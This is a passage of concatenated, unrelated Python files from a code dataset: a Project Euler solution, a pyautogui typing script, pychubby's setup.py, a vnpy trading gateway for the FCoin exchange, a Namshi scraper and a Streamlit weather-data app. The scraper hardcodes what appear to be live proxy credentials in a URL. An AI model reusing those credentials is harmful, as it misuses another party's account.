main()","repo_name":"balagdivya/dbsplitsql","sub_path":"dbsplitsql/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6847172090","text":"#What is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n\n\ndef divisible_by_1_to_20(n):\n factors = [7,9,11,13,16,17,19] # prime powers to check (9 = 3**2, 16 = 2**4); divisibility by 5 is guaranteed since both 2000 and 160 below are multiples of 5\n for i in factors:\n if n % i != 0:\n return False\n return True\n\nnumber = 2000\nwhile True:\n if divisible_by_1_to_20(number):\n print(number)\n break\n number +=160 #large step for speed; reduce it if unsure the step pattern hits the answer\n","repo_name":"cryptozealot/projecteuler","sub_path":"005.py","file_name":"005.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10741253675","text":"import pyautogui\r\nimport keyboard\r\nimport time\r\n\r\nwith open(input(\"FILENAME: \"), \"r\") as f:\r\n tables = f.readlines()\r\n\r\nprint (tables)\r\n\r\nkeyboard.wait(\"\\n\")\r\ntime.sleep(3)\r\ndef thing():\r\n for line in tables:\r\n line = line.replace(\"\\n\",\"\") # assign the result; str.replace returns a new string\r\n print(line)\r\n pyautogui.write(line, 0.005)\r\n pyautogui.write(\"\\n\")\r\nthing()\r\n","repo_name":"spinjrock/Goofy-Goober-Repo","sub_path":"translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20529155442","text":"from setuptools import setup\nimport os\n\nimport pychubby\n\nINSTALL_REQUIRES = [\n \"click>=7.0\",\n \"matplotlib>=2.0.0\",\n \"numpy>=1.16.4\",\n \"opencv-python>=4.1.0.25\",\n \"scikit-image\",\n]\n\nif \"RTD_BUILD\" not in os.environ:\n # ReadTheDocs cannot handle compilation\n INSTALL_REQUIRES += [\"dlib\"]\n\nLONG_DESCRIPTION = \"Automated face warping tool\"\nPROJECT_URLS = {\n \"Bug Tracker\": \"https://github.com/jankrepl/pychubby/issues\",\n \"Documentation\": \"https://pychubby.readthedocs.io\",\n \"Source Code\": \"https://github.com/jankrepl/pychubby\",\n}\nVERSION = pychubby.__version__\n\nsetup(\n name=\"pychubby\",\n version=VERSION,\n author=\"Jan Krepl\",\n author_email=\"kjan.official@gmail.com\",\n description=\"Automated face warping tool\",\n long_description=LONG_DESCRIPTION,\n url=\"https://github.com/jankrepl/pychubby\",\n project_urls=PROJECT_URLS,\n packages=[\"pychubby\"],\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Intended Audience :: Science/Research\",\n \"Intended 
Audience :: Developers\",\n \"Programming Language :: C\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development\",\n \"Topic :: Scientific/Engineering\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n (\"Programming Language :: Python :: \" \"Implementation :: CPython\"),\n ],\n python_requires='>=3.5',\n install_requires=INSTALL_REQUIRES,\n extras_require={\n \"dev\": [\"codecov\", \"flake8\", \"pydocstyle\", \"pytest>=3.6\", \"pytest-cov\", \"tox\"],\n \"docs\": [\"sphinx\", \"sphinx_rtd_theme\"],\n },\n entry_points={\"console_scripts\": [\"pc = pychubby.cli:cli\"]},\n)\n","repo_name":"jankrepl/pychubby","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"35"} +{"seq_id":"31751324306","text":"# encoding: UTF-8\n\n'''\nvnpy.api.fcoin的gateway接入\n'''\nfrom __future__ import print_function\n\nimport os\nimport json\nimport time\nimport traceback\nfrom datetime import datetime, timedelta\nfrom copy import copy\nfrom math import pow\n\nfrom vnpy.api.fcoin import FcoinRestApi, FcoinWebsocketApi\nfrom vnpy.trader.vtGateway import *\nfrom vnpy.trader.vtFunction import getJsonPath, getTempPath\n\n# 委托状态类型映射\nstatusMapReverse = {}\nstatusMapReverse['submitted'] = STATUS_NOTTRADED\nstatusMapReverse['partial_filled'] = STATUS_PARTTRADED\nstatusMapReverse['partial_canceled'] = STATUS_CANCELLED\nstatusMapReverse['filled'] = STATUS_ALLTRADED\nstatusMapReverse['canceled'] = STATUS_CANCELLED\nstatusMapReverse['pending_cancel'] = STATUS_UNKNOWN\n\n# 方向映射\ndirectionMap = {}\ndirectionMap[DIRECTION_LONG] = 'buy'\ndirectionMap[DIRECTION_SHORT] = 'sell'\ndirectionMapReverse = {v:k for k,v in directionMap.items()}\n\n# 价格类型映射\npriceTypeMap = {}\npriceTypeMap[PRICETYPE_LIMITPRICE] = 'limit'\npriceTypeMap[PRICETYPE_MARKETPRICE] = 'market'\n\n\n\n########################################################################\nclass FcoinGateway(VtGateway):\n \"\"\"FCOIN接口\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, eventEngine, gatewayName=''):\n \"\"\"Constructor\"\"\"\n super(FcoinGateway, self).__init__(eventEngine, gatewayName)\n\n self.restApi = RestApi(self)\n self.wsApi = WebsocketApi(self)\n\n self.qryEnabled = False # 是否要启动循环查询\n\n self.fileName = self.gatewayName + '_connect.json'\n self.filePath = getJsonPath(self.fileName, __file__)\n\n #----------------------------------------------------------------------\n def connect(self):\n \"\"\"连接\"\"\"\n try:\n f = file(self.filePath)\n except IOError:\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = u'读取连接配置出错,请检查'\n self.onLog(log)\n return\n\n # 解析json文件\n setting = json.load(f)\n try:\n apiKey = str(setting['apiKey'])\n apiSecret = str(setting['apiSecret'])\n symbols = setting['symbols']\n except KeyError:\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = u'连接配置缺少字段,请检查'\n self.onLog(log)\n return\n\n # 创建行情和交易接口对象\n self.restApi.connect(apiKey, apiSecret, symbols)\n self.wsApi.connect(apiKey, apiSecret, symbols)\n\n # 初始化并启动查询\n self.initQuery()\n\n #----------------------------------------------------------------------\n def 
subscribe(self, subscribeReq):\n \"\"\"订阅行情\"\"\"\n pass\n\n #----------------------------------------------------------------------\n def sendOrder(self, orderReq):\n \"\"\"发单\"\"\"\n return self.restApi.sendOrder(orderReq)\n\n #----------------------------------------------------------------------\n def cancelOrder(self, cancelOrderReq):\n \"\"\"撤单\"\"\"\n self.restApi.cancelOrder(cancelOrderReq)\n\n #----------------------------------------------------------------------\n def close(self):\n \"\"\"关闭\"\"\"\n self.restApi.close()\n self.wsApi.close()\n \n #----------------------------------------------------------------------\n def initQuery(self):\n \"\"\"初始化连续查询\"\"\"\n if self.qryEnabled:\n # 需要循环的查询函数列表\n self.qryFunctionList = [self.restApi.qryPosition,\n self.restApi.qryOrderSubmitted,\n self.restApi.qryOrderPartialFilled,\n self.restApi.qryOrderCanceled,\n self.restApi.qryOrderFilled,\n self.restApi.qryOrderPartialCanceled]\n \n self.qryCount = 0 # 查询触发倒计时\n self.qryTrigger = 3 # 查询触发点\n self.qryNextFunction = 0 # 上次运行的查询函数索引\n\n self.startQuery()\n\n #----------------------------------------------------------------------\n def query(self, event):\n \"\"\"注册到事件处理引擎上的查询函数\"\"\"\n self.qryCount += 1\n\n if self.qryCount > self.qryTrigger:\n # 清空倒计时\n self.qryCount = 0\n\n # 执行查询函数\n function = self.qryFunctionList[self.qryNextFunction]\n function()\n\n # 计算下次查询函数的索引,如果超过了列表长度,则重新设为0\n self.qryNextFunction += 1\n if self.qryNextFunction == len(self.qryFunctionList):\n self.qryNextFunction = 0\n\n #----------------------------------------------------------------------\n def startQuery(self):\n \"\"\"启动连续查询\"\"\"\n self.eventEngine.register(EVENT_TIMER, self.query)\n\n #----------------------------------------------------------------------\n def setQryEnabled(self, qryEnabled):\n \"\"\"设置是否要启动循环查询\"\"\"\n self.qryEnabled = qryEnabled\n\n\n########################################################################\nclass RestApi(FcoinRestApi):\n \"\"\"REST API实现\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, gateway):\n \"\"\"Constructor\"\"\"\n super(RestApi, self).__init__()\n\n self.gateway = gateway # gateway对象\n self.gatewayName = gateway.gatewayName # gateway对象名称\n \n self.localID = 0\n self.tradeID = 0\n \n self.orderDict = {} # sysID:order\n self.localSysDict = {} # localID:sysID\n self.reqOrderDict = {} # reqID:order\n self.cancelDict = {} # localID:req\n \n #----------------------------------------------------------------------\n def connect(self, apiKey, apiSecret, symbols):\n \"\"\"连接服务器\"\"\"\n self.init(apiKey, apiSecret)\n self.start()\n \n self.symbols = symbols\n self.writeLog(u'REST API启动成功')\n \n self.qryContract()\n \n #----------------------------------------------------------------------\n def writeLog(self, content):\n \"\"\"发出日志\"\"\"\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = content\n self.gateway.onLog(log)\n \n #----------------------------------------------------------------------\n def sendOrder(self, orderReq):\n \"\"\"\"\"\"\n #orderReq.price = 300.0\n #orderReq.volume = 0.01\n \n self.localID += 1\n orderID = str(self.localID)\n vtOrderID = '.'.join([self.gatewayName, orderID])\n \n req = {\n 'symbol': orderReq.symbol,\n 'side': directionMap[orderReq.direction],\n 'type': priceTypeMap[orderReq.priceType],\n 'price': orderReq.price,\n 'amount': orderReq.volume\n }\n \n reqid = self.addReq('POST', '/orders', self.onSendOrder, postdict=req)\n \n # 缓存委托数据对象\n order = 
VtOrderData()\n order.gatewayName = self.gatewayName\n order.symbol = orderReq.symbol\n order.exchange = EXCHANGE_FCOIN\n order.vtSymbol = '.'.join([order.symbol, order.exchange])\n order.orderID = orderID\n order.vtOrderID = vtOrderID\n order.price = orderReq.price\n order.totalVolume = orderReq.volume\n order.direction = orderReq.direction\n order.status = STATUS_UNKNOWN\n \n self.reqOrderDict[reqid] = order\n \n return vtOrderID\n \n #----------------------------------------------------------------------\n def cancelOrder(self, cancelOrderReq):\n \"\"\"\"\"\"\n localID = cancelOrderReq.orderID\n \n if localID in self.localSysDict:\n sysID = self.localSysDict[localID]\n path = '/orders/%s/submit-cancel' %sysID\n self.addReq('POST', path, self.onCancelOrder)\n else:\n self.cancelDict[localID] = cancelOrderReq\n\n #----------------------------------------------------------------------\n def qryContract(self):\n \"\"\"\"\"\"\n self.addReq('GET', '/public/symbols', self.onQryContract)\n\n #----------------------------------------------------------------------\n def qryOrder(self, state):\n \"\"\"\"\"\"\n for symbol in self.symbols:\n req = {\n 'symbol': symbol,\n 'states': state,\n 'limit': 50\n }\n self.addReq('GET', '/orders', self.onQryOrder, params=req)\n \n #----------------------------------------------------------------------\n def qryOrderSubmitted(self):\n \"\"\"\"\"\"\n self.qryOrder('submitted')\n \n #----------------------------------------------------------------------\n def qryOrderPartialFilled(self):\n \"\"\"\"\"\"\n self.qryOrder('partial_filled')\n \n #----------------------------------------------------------------------\n def qryOrderPartialCanceled(self):\n \"\"\"\"\"\"\n self.qryOrder('partial_canceled')\n \n #----------------------------------------------------------------------\n def qryOrderFilled(self):\n \"\"\"\"\"\"\n self.qryOrder('filled')\n \n #----------------------------------------------------------------------\n def qryOrderCanceled(self):\n \"\"\"\"\"\"\n self.qryOrder('canceled')\n \n #----------------------------------------------------------------------\n def qryPosition(self):\n \"\"\"\"\"\"\n self.addReq('GET', '/accounts/balance', self.onQryPosition)\n \n #----------------------------------------------------------------------\n def onSendOrder(self, data, reqid):\n \"\"\"\"\"\"\n if 'msg' in data:\n self.writeLog(data['msg'])\n return\n \n if 'data' in data:\n order = self.reqOrderDict[reqid]\n localID = order.orderID\n sysID = data['data']\n \n self.localSysDict[localID] = sysID\n self.orderDict[sysID] = order\n \n self.gateway.onOrder(order)\n \n # 发出等待的撤单委托\n if localID in self.cancelDict:\n req = self.cancelDict[localID]\n self.cancelOrder(req)\n del self.cancelDict[localID]\n \n #----------------------------------------------------------------------\n def onCancelOrder(self, data, reqid):\n \"\"\"\"\"\"\n pass \n \n #----------------------------------------------------------------------\n def onError(self, code, error):\n \"\"\"\"\"\"\n msg = u'发生异常,错误代码:%s,错误信息:%s' %(code, error)\n self.writeLog(msg)\n \n #----------------------------------------------------------------------\n def onQryOrder(self, data, reqid):\n \"\"\"\"\"\"\n data['data'].reverse()\n \n for d in data['data']:\n orderUpdated = False\n tradeUpdated = False\n \n # 获取委托对象\n sysID = d['id']\n if sysID in self.orderDict:\n order = self.orderDict[sysID]\n else:\n order = VtOrderData()\n order.gatewayName = self.gatewayName\n \n order.symbol = d['symbol']\n order.exchange = 
EXCHANGE_FCOIN\n order.vtSymbol = '.'.join([order.symbol, order.exchange])\n \n self.localID += 1\n localID = str(self.localID)\n self.localSysDict[localID] = sysID\n \n order.orderID = localID\n order.vtOrderID = '.'.join([order.gatewayName, order.orderID])\n \n order.direction = directionMapReverse[d['side']]\n order.price = float(d['price'])\n order.totalVolume = float(d['amount'])\n \n dt = datetime.fromtimestamp(d['created_at']/1000)\n order.orderTime = dt.strftime('%H:%M:%S')\n \n self.orderDict[sysID] = order\n orderUpdated = True\n \n # 检查是否委托有变化\n newTradedVolume = float(d['filled_amount'])\n newStatus = statusMapReverse[d['state']]\n \n if newTradedVolume != float(order.tradedVolume) or newStatus != order.status:\n orderUpdated = True\n \n if newTradedVolume != float(order.tradedVolume):\n tradeUpdated = True\n newVolume = newTradedVolume - order.tradedVolume\n \n order.tradedVolume = newTradedVolume\n order.status = newStatus\n \n # 若有更新才推送\n if orderUpdated:\n self.gateway.onOrder(order) \n \n if tradeUpdated:\n # 推送成交\n trade = VtTradeData()\n trade.gatewayName = order.gatewayName\n \n trade.symbol = order.symbol\n trade.vtSymbol = order.vtSymbol\n \n trade.orderID = order.orderID\n trade.vtOrderID = order.vtOrderID\n \n self.tradeID += 1\n trade.tradeID = str(self.tradeID)\n trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])\n \n trade.direction = order.direction\n trade.price = order.price\n trade.volume = newTradedVolume\n trade.tradeTime = datetime.now().strftime('%H:%M:%S')\n \n self.gateway.onTrade(trade)\n\n #----------------------------------------------------------------------\n def onQryPosition(self, data, reqid):\n \"\"\"\"\"\"\n for d in data['data']:\n account = VtAccountData()\n account.gatewayName = self.gatewayName\n \n account.accountID = d['currency']\n account.vtAccountID = '.'.join([account.gatewayName, account.accountID])\n account.balance = float(d['balance'])\n account.available = account.balance - float(d['frozen'])\n \n self.gateway.onAccount(account) \n \n #----------------------------------------------------------------------\n def onQryContract(self, data, reqid):\n \"\"\"\"\"\"\n for d in data['data']:\n contract = VtContractData()\n contract.gatewayName = self.gatewayName\n \n contract.symbol = d['name']\n contract.exchange = EXCHANGE_FCOIN\n contract.vtSymbol = '.'.join([contract.symbol, contract.exchange])\n contract.name = contract.vtSymbol\n contract.productClass = PRODUCT_SPOT\n contract.priceTick = pow(10, -int(d['price_decimal']))\n contract.size = 1\n \n self.gateway.onContract(contract) \n \n self.writeLog(u'合约信息查询完成')\n \n\n########################################################################\nclass WebsocketApi(FcoinWebsocketApi):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, gateway):\n \"\"\"Constructor\"\"\"\n super(WebsocketApi, self).__init__()\n \n self.gateway = gateway\n self.gatewayName = gateway.gatewayName\n \n self.apiKey = ''\n self.apiSecret = ''\n self.symbols = []\n \n self.tickDict = {}\n \n #----------------------------------------------------------------------\n def connect(self, apiKey, apiSecret, symbols):\n \"\"\"\"\"\"\n self.apiKey = apiKey\n self.apiSecret = apiSecret\n self.symbols = symbols\n \n self.start()\n \n #----------------------------------------------------------------------\n def onConnect(self):\n \"\"\"连接回调\"\"\"\n self.writeLog(u'Websocket API连接成功')\n \n 
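# NOTE: the actual channel subscription is driven by the server: onData() below calls subscribe() when the 'hello' message arrives.\n \n 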
#----------------------------------------------------------------------\n def subscribe(self):\n \"\"\"\"\"\"\n l = []\n for symbol in self.symbols:\n l.append('ticker.' + symbol)\n l.append('depth.L20.' + symbol)\n \n tick = VtTickData()\n tick.gatewayName = self.gatewayName\n tick.symbol = symbol\n tick.exchange = EXCHANGE_FCOIN\n tick.vtSymbol = '.'.join([tick.symbol, tick.exchange])\n self.tickDict[symbol] = tick\n \n req = {\n 'cmd': 'sub',\n 'args': l,\n 'id': 1\n }\n self.sendReq(req)\n \n #----------------------------------------------------------------------\n def onData(self, data):\n \"\"\"数据回调\"\"\"\n type_ = data['type']\n if 'hello' in type_:\n self.subscribe()\n elif 'ticker' in type_:\n self.onTick(data)\n elif 'depth' in type_:\n self.onDepth(data)\n \n #----------------------------------------------------------------------\n def onError(self, msg):\n \"\"\"错误回调\"\"\"\n self.writeLog(msg)\n \n #----------------------------------------------------------------------\n def writeLog(self, content):\n \"\"\"发出日志\"\"\"\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = content\n self.gateway.onLog(log) \n \n #----------------------------------------------------------------------\n def onTick(self, d):\n \"\"\"\"\"\"\n symbol = d['type'].split('.')[-1]\n tick = self.tickDict[symbol]\n \n ticker = d['ticker']\n tick.openPrice = ticker[6]\n tick.highPrice = ticker[7]\n tick.lowPrice = ticker[8]\n tick.lastPrice = ticker[0]\n tick.volume = ticker[9]\n \n if tick.askPrice1:\n self.gateway.onTick(copy(tick))\n\n #----------------------------------------------------------------------\n def onDepth(self, d):\n \"\"\"\"\"\"\n symbol = d['type'].split('.')[-1]\n tick = self.tickDict[symbol] \n \n bids = d['bids']\n asks = d['asks']\n \n tick.bidPrice1 = bids[0]\n tick.bidPrice2 = bids[2]\n tick.bidPrice3 = bids[4]\n tick.bidPrice4 = bids[6]\n tick.bidPrice5 = bids[8]\n \n tick.askPrice1 = asks[0]\n tick.askPrice2 = asks[2]\n tick.askPrice3 = asks[4]\n tick.askPrice4 = asks[6]\n tick.askPrice5 = asks[8] \n \n tick.bidVolume1 = bids[1]\n tick.bidVolume2 = bids[3]\n tick.bidVolume3 = bids[5]\n tick.bidVolume4 = bids[7]\n tick.bidVolume5 = bids[9]\n \n tick.askVolume1 = asks[1]\n tick.askVolume2 = asks[3]\n tick.askVolume3 = asks[5]\n tick.askVolume4 = asks[7]\n tick.askVolume5 = asks[9] \n \n tick.datetime = datetime.fromtimestamp(d['ts']/1000)\n tick.date = tick.datetime.strftime('%Y%m%d')\n tick.time = tick.datetime.strftime('%H:%M:%S')\n \n if tick.lastPrice:\n self.gateway.onTick(copy(tick)) \n\n\n#----------------------------------------------------------------------\ndef printDict(d):\n \"\"\"\"\"\"\n print('-' * 30)\n l = d.keys()\n l.sort()\n for k in l:\n print(k, d[k])\n ","repo_name":"rjj510/vnpy","sub_path":"vnpy_system/vnpy/trader/gateway/fcoinGateway/fcoinGateway.py","file_name":"fcoinGateway.py","file_ext":"py","file_size_in_byte":19811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"13111577158","text":"from openpyxl import load_workbook\nimport requests\nfrom bs4 import BeautifulSoup\nimport xlsxwriter\ncatdata=[]\ncaturl = []\ncatcount =[]\n\nproxy_support ={'https': 'https://11115:7My2Ng@world.nohodo.com:6811'}\n#===========code to iterate through the excel file=============================\n\nworkbook = xlsxwriter.Workbook('E:\\\\Namshi.xlsx')\nworksheet = 
workbook.add_worksheet()\nworksheet.write('A1','URL','bold')\nworksheet.write('B1','Name','bold')\nworksheet.write('C1','Count','bold')\nrow = 1\ncol = 0\n\n\nfile = open(\"E:\\\\Namshi.text\",'w+')\nurl = \"https://en-ae.namshi.com/\"\nrs= requests.get(url,proxies=proxy_support)\nsoup = BeautifulSoup(rs.text, \"lxml\")\ncatLink = soup.find_all(\"li\",{\"data-nm-hover-toggle\": \"data-nm-hover-toggle\"})\nfor cat in catLink:\n liList = cat.find_all(\"ul\",{\"class\": \"level_02\"})\n for li in liList:\n aTag = li.find(\"a\")\n CatName = aTag.text\n# file.write(CatName +\"{\")\n worksheet.write(row,1,CatName)\n CatUrl = \"https://en-ae.namshi.com\" + aTag[\"href\"]\n# worksheet.write(row,1,CatUrl)\n caturl.append(CatUrl)\n row += 1\n \nfor url in caturl:\n worksheet.write(row,0,url)\n file.write(url +\"{\")\n rss= requests.get(url,proxies=proxy_support)\n soup = BeautifulSoup(rss.text, \"lxml\")\n count = soup.find(\"p\",{\"class\": \"items\"})\n print(url)\n print(count)\n if count != []:\n cnt = count.text\n \n file.write(cnt +\"{\")\n worksheet.write(row,2,cnt)\n catcount.append(cnt)\n file.write(\"|\")\n \n# =============================================================================\n# for data , url , cnt from zip(catdata, caturl,catcount):\n# file.write(data, \"!+\", url, \"!+\", cnt)\n# file.close()\n# =============================================================================\n\nfile.close()\nworkbook.close()","repo_name":"hemantkhadye/Hemant-Python","sub_path":"TestURLCount.py","file_name":"TestURLCount.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40572149035","text":"import streamlit as st\nimport pandas as pd\n#import plotly.express as px\nimport numpy as np\nimport glob\nimport os\n#import matplotlib.pyplot as plt\n\n##=================================\n###Datuak lortu\n##=================================\n\n#f_csv='../Denak_batera.csv' #Ubunturako\nf_csv='./Denak_batera.csv' #Github-erako\n\n@st.cache\ndef load_data(path):\n dataset = pd.read_csv(path, sep='\\t')\n return dataset\n\ndf_all = load_data(f_csv)\n\n#################################\n#Sidebar\n#=================================\nwith st.sidebar:\n st.subheader('Dades Meteorològiques')\n st.markdown('Jon Mujika')\n \nst.sidebar.image('star-4167939__480.jpg', width=250)\n\n#==================================\n\nst.header('# Dades Meteorològiques')\nst.markdown('''\nDades obtingudes des de: \n[Meteoprades](https://www.meteoprades.net) : Vilaplana, La-Mussara, Alforja, l\\'Aleixar, l'Albiol \n[AEMET](https://www.meteoprades.net/): Donosti, Bilbo, Gasteiz, Iruña, Alforja, Reus, Tarragona, Vigo \n \nNota 1: fixeu-vos que en el cas d'Alforja hi ha dades de les dues fonts. 
Com diferenciar-les: \n$\\cdot$ Dades de Meteoprades: alforja (tot en minúscula) \n$\\cdot$ Dades d\\'AEMET: Alforja (primera lletra en majúscula) \n\nNota 2: Periode de les dades: \n$\\cdot$ Dades de Meteoprades: a partir de 2019 \n$\\cdot$ Dades d\\'AEMET: a partir de 2013 \n''')\n\n##=================================\n##Euriaren kalkuluak\n##=================================\n\n#Dataframe berri bat euri-egunekin bakarrik (>1 litro)\neuridunak= df_all[df_all['Euria'] > 1]\n\n#Taldeak egin: Tokia eta urteko\neuria_urteko=euridunak.sort_values(['Tokia','Urtea'],ascending=True).groupby(['Tokia','Urtea'], sort = False).sum()['Euria']\n\n#Euri-egunak zenbatu toki eta urteko bakoitzerko\n#Zutabe guztietan kalkulatzen du, baina nik behin behar det. Fetxa zutabera-ko datua gordeko dut, behin bakarrik edukitzeko\neuri_egunak=euridunak.sort_values(['Tokia','Urtea'],ascending=True).groupby(['Tokia','Urtea']).agg(np.size)['Eguna']\n\n##=================================\n## Taula 0: Datu guztiak modu askotara\n##=================================\n\nst.header('## Taula per filtrar totes les dades')\nst.markdown('''\n\t \n\tMenú 'Paràmetre': tria el paràmetre. Les opecions són: \n\t\t\t$\\cdot$ Tmax: Temperatura màxima d'un dia \n\t\t\t$\\cdot$ Tmin: Temperatura mínima d'un dia \n\t\t\t$\\cdot$ Euria: Pluja d'un dia \n\t\t\t$\\cdot$ Vmax: Velocitat màxima del vent d'un dia \n\tMenú 'Municipi': tria el municipi. Hi ha l\\'opció de triar tots els municipis. \n\tMenú 'Any': tria l'any. Hi ha l'opció de tots els anys. \n\tMenú 'Mes': tria el mes. Hi ha l'opció de tots els messos. \n\tMenú 'Nombre de dades': tria quantes dades apareixeran a la taula. \n\tIMPORTANT: per que s'actualitzi la taula, pren el botó 'Envia selecció'. \n\t''') \n\nwith st.form('Taula0'):\n\n\tselected_zer0 = st.selectbox(label='Paràmetre', options=['Tmax','Tmin','Euria','Vmax'])\n\tselected_toki0 = st.selectbox(label='Municipi', options=['Tots', 'vilaplana','la-mussara','laleixar','lalbiol','alforja',\n\t\t'Donostia','Bilbo','Gasteiz','Iruña','Alforja','Reus','Tarragona','Vigo'])\n\tselected_urte0 = st.selectbox(label='Any', options=['Tots',2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\tselected_hilab0 = st.selectbox(label='Mes', options=['Tots', 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])\n\tselected_zenbat0= st.selectbox(label='Nombre de dades', options=[5,10,20,30,50])\n\tsubmitted0 = st.form_submit_button('Envia selecció')\n\n\tif submitted0:\n\n \t#Aurrena, filtratu toki konkretu baterako\n\t\tif (selected_toki0 =='Tots'):\n\t\t\tfilt_1 = df_all\n\t\telse:\n\t\t\tfilt_1 = df_all[df_all['Tokia'] == selected_toki0]\n\t\t#Orain, urte baterako\n\t\tif (selected_urte0 =='Tots'):\n\t\t\tfilt_2 = filt_1 \n\t\telse:\n\t\t\tfilt_2 = filt_1[filt_1['Urtea'] == selected_urte0]\n\t\t#Azkenik, hilabeteka\n\t\tif (selected_hilab0 =='Tots'):\n\t\t\tfilt_3 = filt_2 \n\t\telse:\n\t\t\tfilt_3 = filt_2[filt_2['Hilab'] == selected_hilab0]\n\n\n\t\tif (selected_zer0=='Tmin'):\n\t\t\t\tdata_all=filt_3.sort_values(by=selected_zer0,ascending=True)\n\t\telse:\n\t\t\t\tdata_all=filt_3.sort_values(by=selected_zer0,ascending=False)\n \n\t\tdf_table=data_all[['Tokia','Eguna','Hilab','Urtea',selected_zer0]][:selected_zenbat0]\n\t\t#st.table(df_table)\n\t\tst.table(df_table.style.format({selected_zer0: '{:.1f}'}))\n\n\n##=================================\n## Taula 2: Euriaren datuak urteka\n##=================================\n\nst.header('## Taula amb dades de pluja anuals per un municipi')\nst.markdown('''\n\tPrimer menú, tria el municipi. 
\n\tTot seguit, pren el botó de sota\n\t''') \n\nwith st.form('Taula6'):\n\n\tselected_toki6 = st.selectbox(label='Municipi', options=['vilaplana','la-mussara','laleixar','lalbiol','alforja',\n\t\t'Donostia','Bilbo','Gasteiz','Iruña','Alforja','Reus','Tarragona','Vigo'])\n\tsubmitted6 = st.form_submit_button('Envia selecció')\n\n\tif submitted6:\n\n\t\tfiltered_ta6 = df_all[df_all['Tokia'] == selected_toki6]\n\n\t\tdatuak_ta6=filtered_ta6.sort_values(['Urtea'],ascending=True).groupby(['Urtea'], sort = False).sum()['Euria'] \n\t#datuak_ta6.reset_index(inplace = True)\n \n\t#df_table6=datuak_ta6[['Tokia','Urtea','Euria']][:selected_zenbat]\n\t#st.dataframe(df_table6)\n\t\tst.table(datuak_ta6.map('{:.1f}'.format))#.style.format(\"{:.1f}\"))\n\n##=================================\n## Taula 3: Euriaren datuak hilabeteka\n##=================================\n\nst.header('## Taula amb dades de pluja mensuals per any i per municipi')\nst.markdown('''\n\tPrimer menú, tria el municipi. \n\tSegon menú, tria un any. \n\tPer últim, pren el botó de sota\n\t''') \n\nwith st.form('Taula7'):\n\n\tselected_toki7 = st.selectbox(label='Municipi', options=['vilaplana','la-mussara','laleixar','lalbiol','alforja',\n\t\t'Donostia','Bilbo','Gasteiz','Iruña','Alforja','Reus','Tarragona','Vigo'])\n\t#selected_urte7a = st.selectbox(label='Any 1', options=[2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\t#selected_urte7b = st.selectbox(label='Any 2', options=[2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\tsubmitted7 = st.form_submit_button('Envia selecció')\n\n\tif submitted7:\n\n\t\ttmp_tokia7 = df_all[df_all['Tokia'] == selected_toki7]\n\n\t\tif (selected_toki7=='vilaplana' or selected_toki7=='la-mussara' or selected_toki7=='laleixar' or \n\t\t\tselected_toki7=='lalbiol' or selected_toki7=='alforja'):\n\t\t\t\n\t\t\tfiltered_2023 = tmp_tokia7[tmp_tokia7['Urtea'] == 2023]\n\t\t\tfiltered_2022 = tmp_tokia7[tmp_tokia7['Urtea'] == 2022]\n\t\t\tfiltered_2021 = tmp_tokia7[tmp_tokia7['Urtea'] == 2021]\n\t\t\tfiltered_2020 = tmp_tokia7[tmp_tokia7['Urtea'] == 2020]\n\t\t\tfiltered_2019 = tmp_tokia7[tmp_tokia7['Urtea'] == 2019]\n\t\t\t\n\t\t\tdatuak_2023=filtered_2023.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2022=filtered_2022.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2021=filtered_2021.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2020=filtered_2020.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2019=filtered_2019.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\n\t\t\tbatera = pd.concat([datuak_2023,datuak_2022,datuak_2021,datuak_2020,datuak_2019], ignore_index=True, axis=1)\n\t\t\tbatera=batera.rename(columns = {0:'2023',1:'2022',2:'2021',3:'2020',4:'2019'})\n\t\telse:\n\t\t\tfiltered_2023 = tmp_tokia7[tmp_tokia7['Urtea'] == 2023]\n\t\t\tfiltered_2022 = tmp_tokia7[tmp_tokia7['Urtea'] == 2022]\n\t\t\tfiltered_2021 = tmp_tokia7[tmp_tokia7['Urtea'] == 2021]\n\t\t\tfiltered_2020 = tmp_tokia7[tmp_tokia7['Urtea'] == 